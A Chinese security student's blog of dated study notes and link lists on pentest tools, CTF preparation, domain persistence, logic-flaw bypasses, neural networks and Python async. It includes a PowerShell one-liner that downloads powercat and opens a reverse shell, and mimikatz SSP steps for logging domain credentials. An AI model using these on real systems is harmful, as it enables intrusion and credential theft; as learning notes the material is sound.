https://www.freebuf.com/sectool/197478.html Pompem :一款功能强大的漏洞利用&挖洞工具 (就是一个爬虫,在一些网址找爆出来的漏洞) https://www.freebuf.com/sectool/196070.html bonesi :在实验环境下模拟DDoS攻击流量的工具 (不怎么。。。。) https://www.freebuf.com/sectool/196849.html Goscan:一款功能强大的交互式网络扫描工具 (没有测试过,不多说) https://www.freebuf.com/sectool/197353.html ssrfmap ??待测 https://www.freebuf.com/sectool/198150.html 组装机 (就是linux的几个命令糅合) https://www.freebuf.com/sectool/194769.html Sitadel:一款功能强大的Web应用扫描器 (有时间看下代码,感觉有借鉴的地方) https://www.freebuf.com/sectool/191767.html Sn1per v6.0:一款专为安全专家设计的自动化渗透测试框架 (感觉有点东西) webshell上传的一些总结吧:https://www.freebuf.com/articles/web/201421.html https://www.freebuf.com/sectool/202410.html 目录扫描工具 最后个人觉得可以的有,其中的识别工具那篇总结的很不错: https://www.freebuf.com/articles/web/202560.html 识别工具一些小结(nice) https://www.freebuf.com/sectool/195642.html 分布式Web漏洞扫描平台WDScanner (符合自己要做的,待测试) https://www.freebuf.com/sectool/202375.html wpscan12在线扫描(符合自己要做的,待测试) https://github.com/knownsec/pocsuite3 https://github.com/Xyntax/POC-T 经典脚本 2019.5.17 机器学习–神经网络算法 简单了解下吧 神经网络算法: 区别: http://dingby.site/2018/03/13/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E3%80%81%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E3%80%81%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E5%92%8C%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E7%9A%84%E5%8C%BA%E5%88%AB/ (人工智能、机器学习、深度学习和神经网络的区别) 神经网络浅谈: https://www.cnblogs.com/subconscious/p/5058741.html 多层 nice的nice 理解神经网络 https://baike.baidu.com/item/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%AE%97%E6%B3%95 向前算法: http://qianzuncheng.com/blog/tech/001/DNN_with_JAVA.html(DNN (Deep Neural Network) 深度神经网络) 反向算法: https://www.cnblogs.com/pinard/p/6418668.html(深度神经网络(DNN)模型与前向传播算法) https://blog.csdn.net/u014313009/article/details/51039334(反向传播算法(过程及公式推导)) https://www.zhihu.com/question/27239198(如何直观地解释 backpropagation 算法?) https://www.cnblogs.com/charlotte77/p/5629865.html (一文弄懂神经网络中的反向传播法——BackPropagation) 补充: https://www.jqr.com/article/000533(基础目标检测算法介绍(一):CNN、RCNN、Fast RCNN和Faster RCNN) https://www.jiqizhixin.com/articles/2017-05-15-7(对比图像分类五大方法:KNN、SVM、BPNN、CNN和迁移学习) https://zhuanlan.zhihu.com/p/31104370(CNN算法原理与代码实现) https://blog.csdn.net/v_JULY_v/article/details/51812459 https://www.jianshu.com/p/c5cda5a52ee4(神经网络——BP算法) 2019.5..18 人工智能、机器学习、深度学习和神经网络的区别 个人认为还是要有一个简单的大体认识,就单独转载出来了 一.序言: 先写出到这篇文章为止,自己的暂时性理解吧 其实简单看了一些机器学习的一些东西,会发现机器学习“强行”用数学的方法去预估分类数据,根据经验而谈就是该这样的意思(不管是有监督的knn,逻辑回归,决策树,支持向量机算法,无监督的k-means,apriori算法等,会发现都在对数据进行分类,找到一条线,一个面,一个体来分类数据(计算多维降维)) 而人工智能就是不断的反向调权重(即调数学公式中的参数,使数学表示函数趋势更趋近于训练样本于目标),ok,这些都是后话,如果能减轻人的重复劳动,还是很不错的,可能再学一段时间,有不同的体会吧(不要问数学问题,意思就是那个意思。。。。。。。) 而人工智能能多次被发展起来,关键在于每次都是数学问题被解决了,加之机器性能明显提升了,06年好像是第三次人工智能热潮的开始 二.人工智能、机器学习、深度学习和神经网络的区别(转载) 参考:http://dingby.site/2018/03/13/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E3%80%81%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E3%80%81%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E5%92%8C%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E7%9A%84%E5%8C%BA%E5%88%AB/ 按照文中所说,人工智能包含,机器学习包含深度学习 2019.5.18 Python 常用的标准库以及第三方库有哪些?(转载知乎) 蛮实用,不过是18年5月以前的了 参考:https://www.zhihu.com/question/20501628 2. https://www.cnblogs.com/aipiaoborensheng/p/7813087.html 18年的知乎回答,可以当作一个笔录,用时比对,其中一起的视频解码,文档转换,页面抓取分析,都有专门的库,真正的省时省力 2019.5.23 powershell反弹端口 1.payload powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.85.129 -p 6666 -e cmd 2. 下载脚本反弹端口 下载脚本反弹到msf powershell 取证 powersploit用法 http://www.ifind.cc/view/154 不错 https://www.uedbox.com/post/54632/ 反弹Shell大全与原理 https://www.anquanke.com/post/id/99793 powershell反弹shell常见方式 https://paper.seebug.org/610/#powerhsell 内网备忘录 https://www.bbsmax.com/A/VGzlVBR75b/ 利用powershell反弹shell到metasploit https://parrotsec-cn.org/t/topic/663 Powershell在渗透测试中的技巧总结 powershell各种反弹姿势以及取证 https://wooyun.js.org/drops/powershell%E5%90%84%E7%A7%8D%E5%8F%8D%E5%BC%B9%E5%A7%BF%E5%8A%BF%E4%BB%A5%E5%8F%8A%E5%8F%96%E8%AF%81%EF%BC%88%E4%B8%80%EF%BC%89.html https://juejin.im/post/5aa116f76fb9a028d20784bd http://copyfuture.com/blogs-details/5aab5d82fa99aa8154c76a838cd50ef4 powersploit的用法 2019.6.1 知道创宇研发技能表v3.1 转载:http://blog.knownsec.com/Knownsec_RD_Checklist/index.html 2019年7月计划 没有规划的旅途是迷茫的 今天刚好考完试,于情于理都要好好规划下 1. 10-20号准备21号的ctf比赛 具体点 一.CTF基础归纳,常考准备,其他视情况(常考的有较多变化的web题其实就下面几种) sql: 用什么替代 二次注入 盲注脚本 xss: 获取cookie 遇到的题少 命令执行: php 序列化: 两道 python沙箱: 两道 过滤 上传: 两道 条件竞争 重点 爆破准备: 字典 工具 网站目录准备: 字典 工具 二.AWD准备 1.防护 防护脚本 防护命令 攻击手段的获取 2.攻击 代码审计 脚本批量攻击 脚本提交flag 2. 23-31号网站测试,测试一个吧,尝试下定点攻击,从各方面获取信息,测试目标;看下能不能突破技术瓶颈 3. 23-31号 代码编写,把已经编写的归纳耦合在一起。大体测试已经编写完成,更深的个人并不打算编写了,性价比着实不高,就简单测试下即可 4. 就这些吧,个人八月决定好好考虑去路,到时候再说 不过下学期的教师资格证应该会去考 2019.7.8 为了距离学霸小姐姐更近,还是要努力积累知识 这个假期有点短,但有计划是好的,会尽力去做,过的充实 一.学习上 1. 编写相关代码(对这个的要求一次比一次低了) 2. 先速度录完该做的视频 7.30号之前,本来打算定点渗透的,感觉对于知识的积累帮助不大,还是要再积累,改为python和java的代码审计,类型是那些,剩下的是属于与利用(也是这次awd给自己提了个醒,真实环境千变万化) 3. 8-1到8-5的定点渗透,目标xxx 4. 8-6到8-10进行这两年来计算机知识的复习与总结 5. 剩下的时间:好好想想自己的未来;如果方向错了,停下来就是前进 以前真的思想出了偏差,认为很多事都没有意义,可反过头来问自己,自己又做了哪些有意义的事呢,喜欢,感兴趣就好,人生没必要那么的累(但必要的累还是必须要有的) 二.生活作息上: 早睡真的做不到,夜的时间可以无限长,白天的时间做不了主 尽力12.00睡觉,7.40起床,有这个条件当然要睡午觉 除特殊天,就是一日三餐 想起就运动下 2019.7.23 Win10自动更新怎么永久关闭?有效的Win10强制更新关闭方法 虚拟机配置错了cpu,直接卡更新了,费了C盘10个G,最重要的是根本不知道更新的是什么内容 参考:https://baijiahao.baidu.com/s?id=1630106446242598332&wfr=spider&for=pc( 服务、注册表、组策略、计划任务 进行堵截) 2019.8.10 dll劫持反弹后门–backdoor-factory后门工具 两个知识点都是知识的盲区 本地实验利用难度不大,生成与执行(具体未测试) 参考:https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851125&idx=1&sn=f5527e2dd48da083c6f856a4d8345bb0&chksm=bd5937788a2ebe6e7ac3be6b812b41491238dbac57a2248b4cbde393ad86a8f46e66255ab819&mpshare=1&scene=23&srcid=&sharer_sharetime=1565355755208&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd 2019.8.10 DNSLog在渗透中的使用 http://www.admintony.com/DNSLog%E5%9C%A8%E6%B8%97%E9%80%8F%E4%B8%AD%E7%9A%84%E4%BD%BF%E7%94%A8.html 看问题要看到本质:从Web服务器说起 参考:https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851201&idx=1&sn=7e809bbae0405a2f3e3aa24966c9e1bb&chksm=bd5930cc8a2eb9da314f11e7a9c894d9ff15efeb048483716041a53a7d168aa54060b46abf3c&mpshare=1&scene=23&srcid=&sharer_sharetime=1565356503460&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd 2019.8.21 PowerTools的介绍(转载) 下载: https://github.com/cheetz/PowerTools 参考: https://www.anquanke.com/post/id/92646(前第一部分) 2019.8.30 PowerSploit的介绍 看PowerSploit更新是3、4年前的,没什么说的,就知道有这么回事就行了 脚本下载: https://github.com/PowerShellMafia/PowerSploit 参考: https://xz.aliyun.com/t/263 https://blog.csdn.net/a1453514850/article/details/88084702 https://www.cnblogs.com/yuzly/p/10505365.html https://www.freebuf.com/sectool/131275.html https://www.zhulou.net/post/1263.html 一些脚本注解 https://www.secpulse.com/archives/55893.html 操作 https://www.freebuf.com/sectool/131275.html 操作 2019.8.30 域渗透——Hook PasswordChangeNotify(转载) dll+ps1 参考:http://www.vuln.cn/6812 2019.8.29 域渗透——利用GPO中的计划任务实现远程执行(转载) 类似linux下定时任务crontab 1.图形化实现 2.命令行实现(精髓,深度原因,暂不尝试) 参考: https://www.anquanke.com/post/id/86531 https://www.4hou.com/penetration/15268.html (nice) 图形化操作,按照上文,在C:\Windows\SYSVOL\sysvol\test.com\Policies{CBC1FE85-B719-4D44-8077-922A1EE1DA27}\User\Preferences\ScheduledTasks中有计划任务 2019.8.29 域渗透–DSRM、AdminSDHolder和SDProp(转载) 两个部分 dsrm看下,adminsdholder个人硬是没有在windows2012找到 dsrm 参考:https://www.freebuf.com/articles/system/80968.html as,参考: https://www.4hou.com/penetration/5482.html https://www.4hou.com/penetration/19634.html https://docs.microsoft.com/zh-cn/previous-versions/technet-magazine/ee361593(v=msdn.10) 2019.8.29 域渗透–Security Support Provider–ssp(转载) 了解有这么个东西,个人把这域渗透获得密码和维持权限几种都是分开记录 参考:http://www.tiejiang.org/23468.html 具体参照上文,有详细步骤 将mimilib.dll复制到域控c:\windows\system32下 (mimikatz文件夹中有这个文件) regedit 搜索: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages\ 个人这里是 HKEY_LOCAL_MACHINE\System\CurrentControlSet001\Control\Lsa\Security Packages\ 域控重启后在c:\windows\system32可看到新生成的文件kiwissp.log 2019.8.28 会话固定漏洞 原因:set-cookie之前id和登陆后id一样 利用:点击利用 防御:重置会话前的匿名id 具体参考(https://blog.csdn.net/lisheng19870305/article/details/50754510 2019.1.3

freebuf和安全客关于逻辑关键词的文章小结

大概翻了下,还是比较少,而且内容就那些了,个人感觉干货不多

1.业务逻辑漏洞探索之绕过验证
https://www.freebuf.com/column/194658.html
ID区分

客户端流程控制绕过
直接跳到重置密码的页面

操作目标篡改绕过
修改某系统的绑定手机

程序猿小哥哥在编写验证程序时有可能会对验证码字段进行正确性校验,但当验证码字段不存在或为空时就直接通过校验

访问某系统,一开始页面无验证码。
多次尝试之后发现,验证码是通过cookie中的PHPSESSID来判断的。


2.https://www.freebuf.com/column/162397.html
当我们把密码固定后利用系统验证可以绕过的漏洞,可以对银行号进行爆破,众所周知,银行卡密码为6位数字,而且有很多为123456等弱口令,可以利用他系统的加密方法对常用口令进行加密,然后进行爆破测试。
密码找回
验证码回传 验证码时间长,不失效可爆破(字典可去除全1重复数多的) 修改密码,修改发送手机号修改为自己可控, 邮箱验证可猜测 假如找回需要4部,最后一部有user参数,用自己账号正常到第三部,第四部修改user实现逻辑 可以跳步找回(直接访问页面) 本地验证,修改返回值 服务器验证为空,包中直接删除验证码 个别验证码全0可绕过 token生成可控(wooyun两篇实例) cookie覆盖 删除验证码校验,绕过
万能密码



3.https://www.freebuf.com/column/194832.html
客户端代码注释
某平台sqlserver没有对错误进行正确的处理,将详细的错误信息展示出来,暴露出数据库列名。


4.一个小结
https://www.freebuf.com/column/169135.html


5.实例分析
https://www.freebuf.com/vuls/151196.html


6.
https://www.freebuf.com/articles/web/166667.html
任意用户密码重置(六):应答中存在影响后续逻辑的状态参数
拦截应答
简单分析发现,校验通过时服务端并未向客户端 set-cookie,猜测服务端并未记录校验状态,是否进入设置新密码页面完全是由前端 js 基于应答状态决定的,那么,即便我没有短信验证码,通过将服务端下发给客户端的校验状态从“失败”改为“成功”,也能成功重置找回账号密码。



7.
https://www.freebuf.com/vuls/112339.html
1. 在输入接口设置验证,如token,验证码等。

如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。

如果设定token,请确保每个token只能采用一次,并且对token设定时间参数。

2. 注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。

3. 验证码请不要以短数字来甚至,最好是以字母加数字进行组合,并且验证码需要设定时间期限。

4. 优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合。

5. 以上这是部分个人建议,实际方案需要参考业务的具体情况。

用户修改密码时,邮箱中会收到一个含有auth的链接,在有效期内用户点击链接,即可进入重置密码环节。而大部分网站对于auth的生成都是采用rand()函数,那么这里就存在一个问题了,Windows环境下rand()最大值为32768,所以这个auth的值是可以被枚举的。



8.Uber逻辑漏洞
https://www.freebuf.com/vuls/107881.html



9.BlackHat(世界黑帽大会)官方APP出现两个逻辑漏洞
https://www.freebuf.com/news/110748.html
一般大家在网上通过邮箱注册的时候都会有个验证,主要是用来区别该邮箱是否已经注册过互联网账号,但是Black Hat不按套路出牌啊!假设A用户用自己的邮箱注册了black hat 2016的账号。这个时候,B用户不想掏钱购买大会门票,于是用A用户的邮箱再注册了一个 Black Hat 2016的账号。也就是说,黑客可以利用已经被注册的邮箱账号再注册一遍Black Hat账号。我画一张图给大家演示一下。
一般来说,当大家更改密码以后,之前的cookie值是不能够继续使用的,需要用户重新登陆账号。Black Hat对自己的APP安全好像很有信心,所以在用户更改密码后,之前的cookie值还能一直使用。WTF?!没错,就是这样。解释清楚一点就是,假设A的账号被B盗取了,并且登陆在B的手机上。这个时候,A重置了自己的Black Hat账号的密码。但是只要B不退出A的账号,B就可以一直查看A的Balck 账号所有信息。弱弱的问一下Black Hat,APP传输数据的过程中就不能加上session吗?



10.https://www.freebuf.com/column/188195.html
3.点击去实名认证后,通过抓包能够抓到一串链接:
http://***.***.cn/**/**/index**?m0SRP4aSM4K/zfv6tLa7+32jUdEC0ca79BZ8izFvmPSg+5HLkcgg/ltb+bhcySn14uVuXzEmbWIEvLFG70TOVqHPsqvlp/W28sSqG1t+yH/F1Lr/W4sovX3BFWtW14sH+ofndzOMxfeYaRafYypJT/CKvWhZ8Q3x+deWfgGJ300=
4.尝试将此链接通过另外一个未登录任何账号的浏览器访问,成功访问到了并显示了实名认证的账号也就是用户名,并且能直接帮助该账号进行实名认证:





1.通用性业务逻辑组合拳劫持你的权限 (CSRF) 不错的学习思路
https://www.anquanke.com/post/id/106961


2.src
https://www.anquanke.com/src

2019.2.19

freebuf和合天6、7月关于漏洞的文章小结

习惯隔一段时间去翻翻,挑一些感兴趣、有需要的进行观察复现测试

freebuf:

其中比较有意思的是:
https://github.com/s0md3v/AwesomeXSS#awesome-tips–tricks xss漏洞利用库
https://www.freebuf.com/vuls/206064.html Mybb 18.20从存储型XSS到RCE分析
https://www.freebuf.com/vuls/208915.html 增加兴趣吧

了解:
https://www.freebuf.com/vuls/209227.html 挖洞经验丨敏感信息泄露+IDOR+密码确认绕过=账户劫持
https://www.freebuf.com/vuls/208369.html 挖洞经验丨看我如何突破速率限制拿下任意Instagram账户
https://www.freebuf.com/vuls/207639.html Blind XXE详解与Google CTF一道题分析
https://www.freebuf.com/vuls/206888.html DM企业建站v20190522
https://www.freebuf.com/vuls/207029.html
https://www.freebuf.com/vuls/207025.html 挖洞经验丨印尼电商平台Tokopedia的反射型XSS漏洞
https://www.freebuf.com/vuls/206515.html 挖洞经验 | 谷歌票据上传系统中的Blind XSS漏洞
https://www.freebuf.com/vuls/206406.html 挖洞经验 | 越权

合天:

个人以前也在这个平台写过几篇文章,今年4月到现在因为各种原因也没有去写了,积累吧,知识慢慢累积

http://www.pc6.com/softview/SoftView_669374.html  超级弱口令检查工具
解决方法:添加注册表 AllowEncryptionOracle 项即可。
参考:https://www.cnblogs.com/lindajia/p/9021082.html
mssql
https://mp.weixin.qq.com/s/01j8URfEvkfAk2W_HJcluw
dll劫持
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851125&idx=1&sn=f5527e2dd48da083c6f856a4d8345bb0&chksm=bd5937788a2ebe6e7ac3be6b812b41491238dbac57a2248b4cbde393ad86a8f46e66255ab819&mpshare=1&scene=23&srcid=&sharer_sharetime=1565355755208&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd
记一次获取远程桌面历程
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851192&idx=1&sn=ad06cd32a7a14febdb6b16f03e1e3f8a&chksm=bd5937358a2ebe23582f305e5e662f0c5417b0e47d63386c00bee9aaeb844c16f64e85a32ac1&mpshare=1&scene=23&srcid=&sharer_sharetime=1565356452629&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd
从Web服务器说起
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851201&idx=1&sn=7e809bbae0405a2f3e3aa24966c9e1bb&chksm=bd5930cc8a2eb9da314f11e7a9c894d9ff15efeb048483716041a53a7d168aa54060b46abf3c&mpshare=1&scene=23&srcid=&sharer_sharetime=1565356503460&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd
jwt
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851216&idx=1&sn=55b926b0454044b478debf4a4569582c&chksm=bd5930dd8a2eb9cb95093ccf9472af86527d83a9e42b6b11eeb1ee872515db371bd30d2c78ce&mpshare=1&scene=23&srcid=&sharer_sharetime=1565356664089&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd
域渗透之中继攻击
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851396&idx=1&sn=0037f5ef47fcc173f42072fc1d5241b9&chksm=bd5930098a2eb91f60115c3778f28b03895f45de9365c14eaaa8773baedd75515c66e39343bb&mpshare=1&scene=23&srcid=&sharer_sharetime=1565358928390&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd
nb:
https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652851403&idx=1&sn=7b206b9afd7a9e84bd556b97e40edc47&chksm=bd5930068a2eb910b28496b35b5a14164516aca27b573880bef4dbf5e67e7aa6275fe272e470&mpshare=1&scene=23&srcid=&sharer_sharetime=1565359086313&sharer_shareid=8c853626d9d33b478d8252a65f92f635#rd


2019.8.9

Python3编写的CMS漏洞检测工具

正文:

1.poc300的检测工具

转自:http://www.freebuf.com/sectool/149883.html
原作者代码的地址:https://github.com/Lucifer1993/AngelSword
其中kali上安装好作者在github上所说的所需库,就可以正常运行了
作者整理的还是很nice了。

2.CMS漏洞检测工具 – CMSmap(用到才下)

CMSmap目前只支持WordPress,Joomla和Drupal。
https://github.com/Al1ex/CMSmap

3.用过一次,效果不好,老版本了(github的开源好就好在,它跟着时代在走)

摘自:https://www.exehack.net/128.html
支持的CMS如下:

  1. ASP CMS
  2. SHOPXP
  3. 良精南方数据
  4. PHPWEB
  5. SHOPV8
  6. 网趣商城
  7. SHOPEX
  8. ECSHOP
  9. ESP CMS
  10. 08CMS
  11. 最土团购

软件截图:

下载地址:http://pan.baidu.com/s/1kT5MNlH
提取密码: n2uu
解压密码:www.exehack.net

4.网友整理的工具(用到再尝试)

http://www.freebuf.com/sectool/1973.html

5.Typecho CMS 漏洞 利用 工具(没有试过)

摘自:https://www.cnblogs.com/ms016/p/7797166.html
漏洞存在会 在目标网站目录下生成一个expsky.php 的一句话木马 连接密码也是expsky
查看漏洞是否存在主要看发送数据包之后返回的状态码 状态码500说明漏洞存在
链接: https://pan.baidu.com/s/1slx9dXr 密码: r3e9
工具可以使用哈勃分析在使用
 
 
 
2018.8.22

python异步(一)

参考:

https://blog.51cto.com/445153/2138832
https://blog.csdn.net/pythonxuexi/article/details/80494342
https://www.cnblogs.com/earendil/p/7411115.html 经典
https://www.cnblogs.com/shenh/p/9090586.html
https://blog.csdn.net/asd529735325/article/details/81335419
https://www.jianshu.com/p/5f41d9fb6b12 很不错的解释
https://www.cnblogs.com/ssyfj/p/9219263.html

1.常见理解

阻塞

非阻塞

并行

并发

线程

进程

协程

同步

异步

回调

事件循环

任务对象

生成器

下面这段来自:https://www.jianshu.com/p/5f41d9fb6b12

1.但对于程序来说,cpu的计算速度实在是太快了,速度只能用快的飞起来形容,大部分任务中耗时的是磁盘读取和写入、等待服务器响应等等,所以cpu通常都是1秒就做完了自己的事情(其实远没有1秒,可能只要毫秒或者纳秒),而要傻傻的等磁盘或者网络加载到天荒地老。
2.此时在编程中就需要采取异步的思想,cpu做完自己的事情后,可以先去干别的事情,让磁盘或者网络慢慢的去写入和加载,cpu只需要偶尔过来瞄一眼看看磁盘有没有做完,如果磁盘做完了事情,那么cpu就继续往下做事,如果磁盘还没做完,cpu就继续做别的事情,直到磁盘做完。
3.在Python3.6后,可以通过关键词async def来定义一个coroutine协程,协程就相当于未来需要完成的任务,多个协程就是多个需要完成的任务,多个协程可以进一步封装到一个task对象中,task就是一个储存任务的盒子。此时,装在盒子里的任务并没有真正的运行,需要把它接入到一个监视器中使它运行,同时监视器还要持续不断的盯着盒子里的任务运行到了哪一步,这个持续不断的监视器就用一个循环对象loop来实现。

2.常见库与框架:

asyncio
asihttp
selelctors
gevent+requests
grequests===>gevent+request是对上面的结合使用
twisted的使用
tornado的使用
django中实现 django-celery
scrapy

2019.4.28

发表评论

电子邮件地址不会被公开。 必填项已用*标注